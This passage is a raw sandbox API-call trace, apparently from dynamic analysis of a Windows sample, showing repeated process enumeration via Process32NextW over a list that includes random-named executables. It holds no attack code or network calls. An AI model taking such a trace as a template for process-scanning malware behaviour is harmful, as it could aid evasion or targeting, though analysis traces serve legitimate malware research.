th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.905] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.907] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0105.908] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0105.909] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0105.910] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.911] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.912] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0105.913] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0105.914] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) 
returned 1 [0105.915] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0105.917] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0105.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0105.919] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0105.920] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0105.965] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0105.966] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="enlargement_zen_vb.exe")) returned 1 [0105.967] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0105.968] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0105.969] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0105.970] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0105.971] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0105.972] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0105.973] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0105.974] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0105.975] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0105.976] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0105.977] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.978] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0105.979] CloseHandle (hObject=0xc4) returned 1 [0105.979] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0105.984] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.985] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0105.985] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.986] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.987] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0105.987] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.988] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.989] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.989] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0105.990] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0105.991] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.991] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.992] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.992] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.993] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.994] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.995] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.995] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.996] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.997] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.998] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.999] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.000] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.001] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.042] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.043] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.045] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.046] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.047] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.048] Process32NextW (in: 
hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0106.051] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.052] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.053] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.055] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.056] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.057] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.058] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0106.059] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.060] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.061] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.062] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.063] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0106.064] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="athletics-americans.exe")) returned 1 [0106.065] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0106.066] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0106.067] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.068] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.069] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0106.069] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0106.070] CloseHandle (hObject=0xbc) returned 1 [0106.070] Sleep (dwMilliseconds=0x12c) [0106.370] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0106.375] Process32FirstW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.376] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0106.376] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.377] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.378] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 